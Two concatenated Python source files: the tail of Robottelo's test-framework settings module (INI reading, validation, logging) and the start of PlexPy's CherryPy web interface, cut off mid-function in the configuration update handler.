self.content_path = None def read(self, reader): """Read Oscap settings.""" self.content_path = reader.get('oscap', 'content_path') def validate(self): """Validate Oscap settings.""" validation_errors = [] if self.content_path is None: validation_errors.append( '[oscap] content_path option must be provided.' ) return validation_errors class PerformanceSettings(FeatureSettings): """Performance settings definitions.""" def __init__(self, *args, **kwargs): super(PerformanceSettings, self).__init__(*args, **kwargs) self.time_hammer = None self.cdn_address = None self.virtual_machines = None self.fresh_install_savepoint = None self.enabled_repos_savepoint = None self.csv_buckets_count = None self.sync_count = None self.sync_type = None self.repos = None def read(self, reader): """Read performance settings.""" self.time_hammer = reader.get( 'performance', 'time_hammer', False, bool) self.cdn_address = reader.get( 'performance', 'cdn_address') self.virtual_machines = reader.get( 'performance', 'virtual_machines', cast=list) self.fresh_install_savepoint = reader.get( 'performance', 'fresh_install_savepoint') self.enabled_repos_savepoint = reader.get( 'performance', 'enabled_repos_savepoint') self.csv_buckets_count = reader.get( 'performance', 'csv_buckets_count', 10, int) self.sync_count = reader.get( 'performance', 'sync_count', 3, int) self.sync_type = reader.get( 'performance', 'sync_type', 'sync') self.repos = reader.get( 'performance', 'repos', cast=list) def validate(self): """Validate performance settings.""" validation_errors = [] if self.cdn_address is None: validation_errors.append( '[performance] cdn_address must be provided.') if self.virtual_machines is None: validation_errors.append( '[performance] virtual_machines must be provided.') if self.fresh_install_savepoint is None: validation_errors.append( '[performance] fresh_install_savepoint must be provided.') if self.enabled_repos_savepoint is None: validation_errors.append( '[performance] enabled_repos_savepoint must be provided.') return validation_errors class RHAISettings(FeatureSettings): """RHAI settings definitions.""" def __init__(self, *args, **kwargs): super(RHAISettings, self).__init__(*args, **kwargs) self.insights_client_el6repo = None self.insights_client_el7repo = None def read(self, reader): """Read RHAI settings.""" self.insights_client_el6repo = reader.get( 'rhai', 'insights_client_el6repo') self.insights_client_el7repo = reader.get( 'rhai', 'insights_client_el7repo') def validate(self): """Validate RHAI settings.""" return [] class TransitionSettings(FeatureSettings): """Transition settings definitions.""" def __init__(self, *args, **kwargs): super(TransitionSettings, self).__init__(*args, **kwargs) self.exported_data = None def read(self, reader): """Read transition settings.""" self.exported_data = reader.get('transition', 'exported_data') def validate(self): """Validate transition settings.""" validation_errors = [] if self.exported_data is None: validation_errors.append( '[transition] exported_data must be provided.') return validation_errors class VlanNetworkSettings(FeatureSettings): """Vlan Network settings definitions.""" def __init__(self, *args, **kwargs): super(VlanNetworkSettings, self).__init__(*args, **kwargs) self.subnet = None self.netmask = None self.gateway = None self.bridge = None def read(self, reader): """Read Vlan Network settings.""" self.subnet = reader.get('vlan_networking', 'subnet') self.netmask = reader.get('vlan_networking', 'netmask') self.gateway = reader.get('vlan_networking', 'gateway') self.bridge = reader.get('vlan_networking', 'bridge') def validate(self): """Validate Vlan Network settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [vlan_networking] subnet, netmask, gateway, bridge ' 'options must be provided.') return validation_errors class UpgradeSettings(FeatureSettings): """Satellite upgrade settings definitions.""" def __init__(self, *args, **kwargs): super(UpgradeSettings, self).__init__(*args, **kwargs) self.upgrade_data = None def read(self, reader): """Read and validate Satellite server settings.""" self.upgrade_data = reader.get('upgrade', 'upgrade_data') def validate(self): validation_errors = [] if self.upgrade_data is None: validation_errors.append('[upgrade] data must be provided.') return validation_errors class Settings(object): """Robottelo's settings representation.""" def __init__(self): self._all_features = None self._configured = False self._validation_errors = [] self.browser = None self.locale = None self.project = None self.reader = None self.rhel6_repo = None self.rhel7_repo = None self.screenshots_path = None self.saucelabs_key = None self.saucelabs_user = None self.server = ServerSettings() self.run_one_datapoint = None self.upstream = None self.verbosity = None self.webdriver = None self.webdriver_binary = None self.webdriver_desired_capabilities = None # Features self.clients = ClientsSettings() self.compute_resources = LibvirtHostSettings() self.discovery = DiscoveryISOSettings() self.docker = DockerSettings() self.fake_capsules = FakeCapsuleSettings() self.fake_manifest = FakeManifestSettings() self.ldap = LDAPSettings() self.oscap = OscapSettings() self.performance = PerformanceSettings() self.rhai = RHAISettings() self.rhev = RHEVSettings() self.transition = TransitionSettings() self.vlan_networking = VlanNetworkSettings() self.upgrade = UpgradeSettings() self.vmware = VmWareSettings() def configure(self): """Read the settings file and parse the configuration. :raises: ImproperlyConfigured if any issue is found during the parsing or validation of the configuration. """ if self.configured: # TODO: what to do here, raise and exception, just skip or ...? return # Expect the settings file to be on the robottelo project root. settings_path = os.path.join(get_project_root(), SETTINGS_FILE_NAME) if not os.path.isfile(settings_path): raise ImproperlyConfigured( 'Not able to find settings file at {}'.format(settings_path)) self.reader = INIReader(settings_path) self._read_robottelo_settings() self._validation_errors.extend( self._validate_robottelo_settings()) self.server.read(self.reader) self._validation_errors.extend(self.server.validate()) if self.reader.has_section('clients'): self.clients.read(self.reader) self._validation_errors.extend(self.clients.validate()) if self.reader.has_section('compute_resources'): self.compute_resources.read(self.reader) self._validation_errors.extend(self.compute_resources.validate()) if self.reader.has_section('discovery'): self.discovery.read(self.reader) self._validation_errors.extend(self.discovery.validate()) if self.reader.has_section('docker'): self.docker.read(self.reader) self._validation_errors.extend(self.docker.validate()) if self.reader.has_section('fake_capsules'): self.fake_capsules.read(self.reader) self._validation_errors.extend(self.fake_capsules.validate()) if self.reader.has_section('fake_manifest'): self.fake_manifest.read(self.reader) self._validation_errors.extend(self.fake_manifest.validate()) if self.reader.has_section('ldap'): self.ldap.read(self.reader) self._validation_errors.extend(self.ldap.validate()) if self.reader.has_section('oscap'): self.oscap.read(self.reader) self._validation_errors.extend(self.oscap.validate()) if self.reader.has_section('performance'): self.performance.read(self.reader) self._validation_errors.extend(self.performance.validate()) if self.reader.has_section('rhai'): self.rhai.read(self.reader) self._validation_errors.extend(self.rhai.validate()) if self.reader.has_section('rhev'): self.rhev.read(self.reader) self._validation_errors.extend(self.rhev.validate()) if self.reader.has_section('transition'): self.transition.read(self.reader) self._validation_errors.extend(self.transition.validate()) if self.reader.has_section('vlan_networking'): self.vlan_networking.read(self.reader) self._validation_errors.extend(self.vlan_networking.validate()) if self.reader.has_section('upgrade'): self.upgrade.read(self.reader) self._validation_errors.extend(self.upgrade.validate()) if self.reader.has_section('vmware'): self.vmware.read(self.reader) self._validation_errors.extend(self.vmware.validate()) if self._validation_errors: raise ImproperlyConfigured( 'Failed to validate the configuration, check the message(s):\n' '{}'.format('\n'.join(self._validation_errors)) ) self._configure_logging() self._configure_third_party_logging() self._configure_entities() self._configured = True def _read_robottelo_settings(self): """Read Robottelo's general settings.""" self.log_driver_commands = self.reader.get( 'robottelo', 'log_driver_commands', ['newSession', 'windowMaximize', 'get', 'findElement', 'sendKeysToElement', 'clickElement', 'mouseMoveTo'], list ) self.browser = self.reader.get( 'robottelo', 'browser', 'selenium') self.locale = self.reader.get('robottelo', 'locale', 'en_US.UTF-8') self.project = self.reader.get('robottelo', 'project', 'sat') self.rhel6_repo = self.reader.get('robottelo', 'rhel6_repo', None) self.rhel7_repo = self.reader.get('robottelo', 'rhel7_repo', None) self.screenshots_path = self.reader.get( 'robottelo', 'screenshots_path', '/tmp/robottelo/screenshots') self.run_one_datapoint = self.reader.get( 'robottelo', 'run_one_datapoint', False, bool) self.cleanup = self.reader.get('robottelo', 'cleanup', False, bool) self.upstream = self.reader.get('robottelo', 'upstream', True, bool) self.verbosity = self.reader.get( 'robottelo', 'verbosity', INIReader.cast_logging_level('debug'), INIReader.cast_logging_level ) self.webdriver = self.reader.get( 'robottelo', 'webdriver', 'firefox') self.saucelabs_user = self.reader.get( 'robottelo', 'saucelabs_user', None) self.saucelabs_key = self.reader.get( 'robottelo', 'saucelabs_key', None) self.webdriver_binary = self.reader.get( 'robottelo', 'webdriver_binary', None) self.webdriver_desired_capabilities = self.reader.get( 'robottelo', 'webdriver_desired_capabilities', None, cast=INIReader.cast_webdriver_desired_capabilities ) self.window_manager_command = self.reader.get( 'robottelo', 'window_manager_command', None) def _validate_robottelo_settings(self): """Validate Robottelo's general settings.""" validation_errors = [] browsers = ('selenium', 'docker', 'saucelabs') webdrivers = ('chrome', 'firefox', 'ie', 'phantomjs', 'remote') if self.browser not in browsers: validation_errors.append( '[robottelo] browser should be one of {0}.' .format(', '.join(browsers)) ) if self.webdriver not in webdrivers: validation_errors.append( '[robottelo] webdriver should be one of {0}.' .format(', '.join(webdrivers)) ) if self.browser == 'saucelabs': if self.saucelabs_user is None: validation_errors.append( '[robottelo] saucelabs_user must be provided when ' 'browser is saucelabs.' ) if self.saucelabs_key is None: validation_errors.append( '[robottelo] saucelabs_key must be provided when ' 'browser is saucelabs.' ) return validation_errors @property def configured(self): """Returns True if the settings have already been configured.""" return self._configured @property def all_features(self): """List all expected feature settings sections.""" if self._all_features is None: self._all_features = [ name for name, value in vars(self).items() if isinstance(value, FeatureSettings) ] return self._all_features def _configure_entities(self): """Configure NailGun's entity classes. Do the following: * Set ``entity_mixins.CREATE_MISSING`` to ``True``. This causes method ``EntityCreateMixin.create_raw`` to generate values for empty and required fields. * Set ``nailgun.entity_mixins.DEFAULT_SERVER_CONFIG`` to whatever is returned by :meth:`robottelo.helpers.get_nailgun_config`. See ``robottelo.entity_mixins.Entity`` for more information on the effects of this. * Set a default value for ``nailgun.entities.GPGKey.content``. * Set the default value for ``nailgun.entities.DockerComputeResource.url`` if either ``docker.internal_url`` or ``docker.external_url`` is set in the configuration file. """ entity_mixins.CREATE_MISSING = True entity_mixins.DEFAULT_SERVER_CONFIG = ServerConfig( self.server.get_url(), self.server.get_credentials(), verify=False, ) gpgkey_init = entities.GPGKey.__init__ def patched_gpgkey_init(self, server_config=None, **kwargs): """Set a default value on the ``content`` field.""" gpgkey_init(self, server_config, **kwargs) self._fields['content'].default = os.path.join( get_project_root(), 'tests', 'foreman', 'data', 'valid_gpg_key.txt' ) entities.GPGKey.__init__ = patched_gpgkey_init # NailGun provides a default value for ComputeResource.url. We override # that value if `docker.internal_url` or `docker.external_url` is set. docker_url = None # Try getting internal url docker_url = self.docker.get_unix_socket_url() # Try getting external url if docker_url is None: docker_url = self.docker.external_url if docker_url is not None: dockercr_init = entities.DockerComputeResource.__init__ def patched_dockercr_init(self, server_config=None, **kwargs): """Set a default value on the ``docker_url`` field.""" dockercr_init(self, server_config, **kwargs) self._fields['url'].default = docker_url entities.DockerComputeResource.__init__ = patched_dockercr_init def _configure_logging(self): """Configure logging for the entire framework. If a config named ``logging.conf`` exists in Robottelo's root directory, the logger is configured using the options in that file. Otherwise, a custom logging output format is set, and default values are used for all other logging options. """ # All output should be made by the logging module, including warnings logging.captureWarnings(True) # Set the logging level based on the Robottelo's verbosity for name in ('nailgun', 'robottelo'): logging.getLogger(name).setLevel(self.verbosity) # Allow overriding logging config based on the presence of logging.conf # file on Robottelo's project root logging_conf_path = os.path.join(get_project_root(), 'logging.conf') if os.path.isfile(logging_conf_path): config.fileConfig(logging_conf_path) else: logging.basicConfig( format='%(levelname)s %(module)s:%(lineno)d: %(message)s' ) def _configure_third_party_logging(self): """Increase the level of third party packages logging.""" loggers = ( 'bugzilla', 'easyprocess', 'paramiko', 'requests.packages.urllib3.connectionpool', 'selenium.webdriver.remote.remote_connection', ) for logger in loggers: logging.getLogger(logger).setLevel(logging.WARNING)
gnowxilef/plexpy
plexpy/webserve.py
# This file is part of PlexPy. # # PlexPy is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # PlexPy is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with PlexPy. If not, see <http://www.gnu.org/licenses/>. from plexpy import logger, notifiers, plextv, pmsconnect, common, log_reader, datafactory, graphs, users from plexpy.helpers import checked, radio from mako.lookup import TemplateLookup from mako import exceptions import plexpy import threading import cherrypy import hashlib import random import json import os try: # pylint:disable=E0611 # ignore this error because we are catching the ImportError from collections import OrderedDict # pylint:enable=E0611 except ImportError: # Python 2.6.x fallback, from libs from ordereddict import OrderedDict def serve_template(templatename, **kwargs): interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/interfaces/') template_dir = os.path.join(str(interface_dir), plexpy.CONFIG.INTERFACE) _hplookup = TemplateLookup(directories=[template_dir]) try: template = _hplookup.get_template(templatename) return template.render(**kwargs) except: return exceptions.html_error_template().render() class WebInterface(object): def __init__(self): self.interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/') @cherrypy.expose def index(self): if plexpy.CONFIG.FIRST_RUN_COMPLETE: raise cherrypy.HTTPRedirect("home") else: raise cherrypy.HTTPRedirect("welcome") @cherrypy.expose def home(self): config = { "home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH, "home_stats_type": plexpy.CONFIG.HOME_STATS_TYPE, "home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT, "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER, } return serve_template(templatename="index.html", title="Home", config=config) @cherrypy.expose def welcome(self, **kwargs): config = { "launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER), "refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP), "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER, "pms_ip": plexpy.CONFIG.PMS_IP, "pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE), "pms_port": plexpy.CONFIG.PMS_PORT, "pms_token": plexpy.CONFIG.PMS_TOKEN, "pms_ssl": checked(plexpy.CONFIG.PMS_SSL), "pms_uuid": plexpy.CONFIG.PMS_UUID, "tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE), "movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE), "music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE), "tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START), "movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START), "music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START), "video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE), "music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE), "logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL, "check_github": checked(plexpy.CONFIG.CHECK_GITHUB) } # The setup wizard just refreshes the page on submit so we must redirect to home if config set. # Also redirecting to home if a PMS token already exists - will remove this in future. if plexpy.CONFIG.FIRST_RUN_COMPLETE or plexpy.CONFIG.PMS_TOKEN: raise cherrypy.HTTPRedirect("home") else: return serve_template(templatename="welcome.html", title="Welcome", config=config) @cherrypy.expose def get_date_formats(self): if plexpy.CONFIG.DATE_FORMAT: date_format = plexpy.CONFIG.DATE_FORMAT else: date_format = 'YYYY-MM-DD' if plexpy.CONFIG.TIME_FORMAT: time_format = plexpy.CONFIG.TIME_FORMAT else: time_format = 'HH:mm' formats = {'date_format': date_format, 'time_format': time_format} cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(formats) @cherrypy.expose def home_stats(self, time_range='30', stat_type='0', stat_count='5', **kwargs): data_factory = datafactory.DataFactory() stats_data = data_factory.get_home_stats(time_range=time_range, stat_type=stat_type, stat_count=stat_count) return serve_template(templatename="home_stats.html", title="Stats", data=stats_data) @cherrypy.expose def library_stats(self, **kwargs): pms_connect = pmsconnect.PmsConnect() stats_data = pms_connect.get_library_stats() return serve_template(templatename="library_stats.html", title="Library Stats", data=stats_data) @cherrypy.expose def history(self): return serve_template(templatename="history.html", title="History") @cherrypy.expose def users(self): return serve_template(templatename="users.html", title="Users") @cherrypy.expose def graphs(self): return serve_template(templatename="graphs.html", title="Graphs") @cherrypy.expose def sync(self): return serve_template(templatename="sync.html", title="Synced Items") @cherrypy.expose def user(self, user=None, user_id=None): user_data = users.Users() if user_id: try: user_details = user_data.get_user_details(user_id=user_id) except: logger.warn("Unable to retrieve friendly name for user_id %s " % user_id) elif user: try: user_details = user_data.get_user_details(user=user) except: logger.warn("Unable to retrieve friendly name for user %s " % user) else: logger.debug(u"User page requested but no parameters received.") raise cherrypy.HTTPRedirect("home") return serve_template(templatename="user.html", title="User", data=user_details) @cherrypy.expose def edit_user_dialog(self, user=None, user_id=None, **kwargs): user_data = users.Users() if user_id: result = user_data.get_user_friendly_name(user_id=user_id) status_message = '' elif user: result = user_data.get_user_friendly_name(user=user) status_message = '' else: result = None status_message = 'An error occured.' return serve_template(templatename="edit_user.html", title="Edit User", data=result, status_message=status_message) @cherrypy.expose def edit_user(self, user=None, user_id=None, friendly_name=None, **kwargs): if 'do_notify' in kwargs: do_notify = kwargs.get('do_notify') else: do_notify = 0 if 'keep_history' in kwargs: keep_history = kwargs.get('keep_history') else: keep_history = 0 if 'thumb' in kwargs: custom_avatar = kwargs['thumb'] else: custom_avatar = '' user_data = users.Users() if user_id: try: user_data.set_user_friendly_name(user_id=user_id, friendly_name=friendly_name, do_notify=do_notify, keep_history=keep_history) user_data.set_user_profile_url(user_id=user_id, profile_url=custom_avatar) status_message = "Successfully updated user." return status_message except: status_message = "Failed to update user." return status_message if user: try: user_data.set_user_friendly_name(user=user, friendly_name=friendly_name, do_notify=do_notify, keep_history=keep_history) user_data.set_user_profile_url(user=user, profile_url=custom_avatar) status_message = "Successfully updated user." return status_message except: status_message = "Failed to update user." return status_message @cherrypy.expose def get_stream_data(self, row_id=None, user=None, **kwargs): data_factory = datafactory.DataFactory() stream_data = data_factory.get_stream_details(row_id) return serve_template(templatename="stream_data.html", title="Stream Data", data=stream_data, user=user) @cherrypy.expose def get_ip_address_details(self, ip_address=None, **kwargs): import socket try: socket.inet_aton(ip_address) except socket.error: ip_address = None return serve_template(templatename="ip_address_modal.html", title="IP Address Details", data=ip_address) @cherrypy.expose def get_user_list(self, **kwargs): user_data = users.Users() user_list = user_data.get_user_list(kwargs=kwargs) cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(user_list) @cherrypy.expose def checkGithub(self): from plexpy import versioncheck versioncheck.checkGithub() raise cherrypy.HTTPRedirect("home") @cherrypy.expose def logs(self): return serve_template(templatename="logs.html", title="Log", lineList=plexpy.LOG_LIST) @cherrypy.expose def clearLogs(self): plexpy.LOG_LIST = [] logger.info("Web logs cleared") raise cherrypy.HTTPRedirect("logs") @cherrypy.expose def toggleVerbose(self): plexpy.VERBOSE = not plexpy.VERBOSE logger.initLogger(console=not plexpy.QUIET, log_dir=plexpy.CONFIG.LOG_DIR, verbose=plexpy.VERBOSE) logger.info("Verbose toggled, set to %s", plexpy.VERBOSE) logger.debug("If you read this message, debug logging is available") raise cherrypy.HTTPRedirect("logs") @cherrypy.expose def getLog(self, start=0, length=100, **kwargs): start = int(start) length = int(length) search_value = "" search_regex = "" order_column = 0 order_dir = "desc" if 'order[0][dir]' in kwargs: order_dir = kwargs.get('order[0][dir]', "desc") if 'order[0][column]' in kwargs: order_column = kwargs.get('order[0][column]', "0") if 'search[value]' in kwargs: search_value = kwargs.get('search[value]', "") if 'search[regex]' in kwargs: search_regex = kwargs.get('search[regex]', "") filtered = [] if search_value == "": filtered = plexpy.LOG_LIST[::] else: filtered = [row for row in plexpy.LOG_LIST for column in row if search_value.lower() in column.lower()] sortcolumn = 0 if order_column == '1': sortcolumn = 2 elif order_column == '2': sortcolumn = 1 filtered.sort(key=lambda x: x[sortcolumn], reverse=order_dir == "desc") rows = filtered[start:(start + length)] rows = [[row[0], row[2], row[1]] for row in rows] return json.dumps({ 'recordsFiltered': len(filtered), 'recordsTotal': len(plexpy.LOG_LIST), 'data': rows, }) @cherrypy.expose def get_plex_log(self, window=1000, **kwargs): log_lines = [] try: log_lines = {'data': log_reader.get_log_tail(window=window)} except: logger.warn("Unable to retrieve Plex Logs.") cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(log_lines) @cherrypy.expose def generateAPI(self): apikey = hashlib.sha224(str(random.getrandbits(256))).hexdigest()[0:32] logger.info("New API generated") return apikey @cherrypy.expose def settings(self): interface_dir = os.path.join(plexpy.PROG_DIR, 'data/interfaces/') interface_list = [name for name in os.listdir(interface_dir) if os.path.isdir(os.path.join(interface_dir, name))] # Initialise blank passwords so we do not expose them in the html forms # but users are still able to clear them if plexpy.CONFIG.HTTP_PASSWORD != '': http_password = ' ' else: http_password = '' config = { "http_host": plexpy.CONFIG.HTTP_HOST, "http_username": plexpy.CONFIG.HTTP_USERNAME, "http_port": plexpy.CONFIG.HTTP_PORT, "http_password": http_password, "launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER), "enable_https": checked(plexpy.CONFIG.ENABLE_HTTPS), "https_cert": plexpy.CONFIG.HTTPS_CERT, "https_key": plexpy.CONFIG.HTTPS_KEY, "api_enabled": checked(plexpy.CONFIG.API_ENABLED), "api_key": plexpy.CONFIG.API_KEY, "update_db_interval": plexpy.CONFIG.UPDATE_DB_INTERVAL, "freeze_db": checked(plexpy.CONFIG.FREEZE_DB), "log_dir": plexpy.CONFIG.LOG_DIR, "cache_dir": plexpy.CONFIG.CACHE_DIR, "check_github": checked(plexpy.CONFIG.CHECK_GITHUB), "interface_list": interface_list, "growl_enabled": checked(plexpy.CONFIG.GROWL_ENABLED), "growl_host": plexpy.CONFIG.GROWL_HOST, "growl_password": plexpy.CONFIG.GROWL_PASSWORD, "prowl_enabled": checked(plexpy.CONFIG.PROWL_ENABLED), "prowl_keys": plexpy.CONFIG.PROWL_KEYS, "prowl_priority": plexpy.CONFIG.PROWL_PRIORITY, "xbmc_enabled": checked(plexpy.CONFIG.XBMC_ENABLED), "xbmc_host": plexpy.CONFIG.XBMC_HOST, "xbmc_username": plexpy.CONFIG.XBMC_USERNAME, "xbmc_password": plexpy.CONFIG.XBMC_PASSWORD, "plex_enabled": checked(plexpy.CONFIG.PLEX_ENABLED), "plex_client_host": plexpy.CONFIG.PLEX_CLIENT_HOST, "plex_username": plexpy.CONFIG.PLEX_USERNAME, "plex_password": plexpy.CONFIG.PLEX_PASSWORD, "nma_enabled": checked(plexpy.CONFIG.NMA_ENABLED), "nma_apikey": plexpy.CONFIG.NMA_APIKEY, "nma_priority": int(plexpy.CONFIG.NMA_PRIORITY), "pushalot_enabled": checked(plexpy.CONFIG.PUSHALOT_ENABLED), "pushalot_apikey": plexpy.CONFIG.PUSHALOT_APIKEY, "pushover_enabled": checked(plexpy.CONFIG.PUSHOVER_ENABLED), "pushover_keys": plexpy.CONFIG.PUSHOVER_KEYS, "pushover_apitoken": plexpy.CONFIG.PUSHOVER_APITOKEN, "pushover_priority": plexpy.CONFIG.PUSHOVER_PRIORITY, "pushbullet_enabled": checked(plexpy.CONFIG.PUSHBULLET_ENABLED), "pushbullet_apikey": plexpy.CONFIG.PUSHBULLET_APIKEY, "pushbullet_deviceid": plexpy.CONFIG.PUSHBULLET_DEVICEID, "twitter_enabled": checked(plexpy.CONFIG.TWITTER_ENABLED), "osx_notify_enabled": checked(plexpy.CONFIG.OSX_NOTIFY_ENABLED), "osx_notify_app": plexpy.CONFIG.OSX_NOTIFY_APP, "boxcar_enabled": checked(plexpy.CONFIG.BOXCAR_ENABLED), "boxcar_token": plexpy.CONFIG.BOXCAR_TOKEN, "cache_sizemb": plexpy.CONFIG.CACHE_SIZEMB, "email_enabled": checked(plexpy.CONFIG.EMAIL_ENABLED), "email_from": plexpy.CONFIG.EMAIL_FROM, "email_to": plexpy.CONFIG.EMAIL_TO, "email_smtp_server": plexpy.CONFIG.EMAIL_SMTP_SERVER, "email_smtp_user": plexpy.CONFIG.EMAIL_SMTP_USER, "email_smtp_password": plexpy.CONFIG.EMAIL_SMTP_PASSWORD, "email_smtp_port": int(plexpy.CONFIG.EMAIL_SMTP_PORT), "email_tls": checked(plexpy.CONFIG.EMAIL_TLS), "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER, "pms_ip": plexpy.CONFIG.PMS_IP, "pms_logs_folder": plexpy.CONFIG.PMS_LOGS_FOLDER, "pms_port": plexpy.CONFIG.PMS_PORT, "pms_token": plexpy.CONFIG.PMS_TOKEN, "pms_ssl": checked(plexpy.CONFIG.PMS_SSL), "pms_use_bif": checked(plexpy.CONFIG.PMS_USE_BIF), "pms_uuid": plexpy.CONFIG.PMS_UUID, "plexwatch_database": plexpy.CONFIG.PLEXWATCH_DATABASE, "date_format": plexpy.CONFIG.DATE_FORMAT, "time_format": plexpy.CONFIG.TIME_FORMAT, "grouping_global_history": checked(plexpy.CONFIG.GROUPING_GLOBAL_HISTORY), "grouping_user_history": checked(plexpy.CONFIG.GROUPING_USER_HISTORY), "grouping_charts": checked(plexpy.CONFIG.GROUPING_CHARTS), "tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE), "movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE), "music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE), "tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START), "movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START), "music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START), "tv_notify_on_stop": checked(plexpy.CONFIG.TV_NOTIFY_ON_STOP), "movie_notify_on_stop": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_STOP), "music_notify_on_stop": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_STOP), "tv_notify_on_pause": checked(plexpy.CONFIG.TV_NOTIFY_ON_PAUSE), "movie_notify_on_pause": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_PAUSE), "music_notify_on_pause": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_PAUSE), "monitoring_interval": plexpy.CONFIG.MONITORING_INTERVAL, "refresh_users_interval": plexpy.CONFIG.REFRESH_USERS_INTERVAL, "refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP), "ip_logging_enable": checked(plexpy.CONFIG.IP_LOGGING_ENABLE), "video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE), "music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE), "logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL, "pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE), "notify_watched_percent": plexpy.CONFIG.NOTIFY_WATCHED_PERCENT, "notify_on_start_subject_text": plexpy.CONFIG.NOTIFY_ON_START_SUBJECT_TEXT, "notify_on_start_body_text": plexpy.CONFIG.NOTIFY_ON_START_BODY_TEXT, "notify_on_stop_subject_text": plexpy.CONFIG.NOTIFY_ON_STOP_SUBJECT_TEXT, "notify_on_stop_body_text": plexpy.CONFIG.NOTIFY_ON_STOP_BODY_TEXT, "notify_on_pause_subject_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_SUBJECT_TEXT, "notify_on_pause_body_text": plexpy.CONFIG.NOTIFY_ON_PAUSE_BODY_TEXT, "notify_on_resume_subject_text": plexpy.CONFIG.NOTIFY_ON_RESUME_SUBJECT_TEXT, "notify_on_resume_body_text": plexpy.CONFIG.NOTIFY_ON_RESUME_BODY_TEXT, "notify_on_buffer_subject_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_SUBJECT_TEXT, "notify_on_buffer_body_text": plexpy.CONFIG.NOTIFY_ON_BUFFER_BODY_TEXT, "notify_on_watched_subject_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_SUBJECT_TEXT, "notify_on_watched_body_text": plexpy.CONFIG.NOTIFY_ON_WATCHED_BODY_TEXT, "home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH, "home_stats_type": checked(plexpy.CONFIG.HOME_STATS_TYPE), "home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT, "buffer_threshold": plexpy.CONFIG.BUFFER_THRESHOLD, "buffer_wait": plexpy.CONFIG.BUFFER_WAIT } return serve_template(templatename="settings.html", title="Settings", config=config) @cherrypy.expose def configUpdate(self, **kwargs): # Handle the variable config options. Note - keys with False values aren't getting passed checked_configs = [ "launch_browser", "enable_https", "api_enabled", "freeze_db", "growl_enabled", "prowl_enabled", "xbmc_enabled", "check_github", "plex_enabled", "nma_enabled", "pushalot_enabled", "pushover_enabled", "pushbullet_enabled", "twitter_enabled", "osx_notify_enabled", "boxcar_enabled", "email_enabled", "email_tls", "grouping_global_history", "grouping_user_history", "grouping_charts", "pms_use_bif", "pms_ssl", "tv_notify_enable", "movie_notify_enable", "music_notify_enable", "tv_notify_on_start", "movie_notify_on_start", "music_notify_on_start", "tv_notify_on_stop", "movie_notify_on_stop", "music_notify_on_stop", "tv_notify_on_pause", "movie_notify_on_pause", "music_notify_on_pause", "refresh_users_on_startup", "ip_logging_enable", "video_logging_enable", "music_logging_enable", "pms_is_remote", "home_stats_type" ] for checked_config in checked_configs: if checked_config not in kwargs: # checked items should be zero or one. if they were not sent then the item was not checked kwargs[checked_config] = 0 # If http password exists in config, do not overwrite when blank value received if 'http_password' in kwargs: if kwargs['http_password'] == ' ' and plexpy.CONFIG.HTTP_PASSWORD != '': kwargs['http_password'] = plexpy.CONFIG.HTTP_PASSWORD for plain_config, use_config in [(x[4:], x) for x in kwargs if x.startswith('use_')]: # the use prefix is fairly nice in the html, but does not match the actual config kwargs[plain_config] = kwargs[use_config] del kwargs[use_config] # Check if we should refresh our data refresh_users = False reschedule = False if 'monitoring_interval' in kwargs and 'refresh_users_interval' in kwargs: if (kwargs['monitoring_interval'] != str(plexpy.CONFIG.MONITORING_INTERVAL)) or \ (kwargs['refresh_users_interval'] != str(plexpy.CONFIG.REFRESH_USERS_INTERVAL)): reschedule = True if 'pms_ip' in kwargs: if kwargs['pms_ip'] != 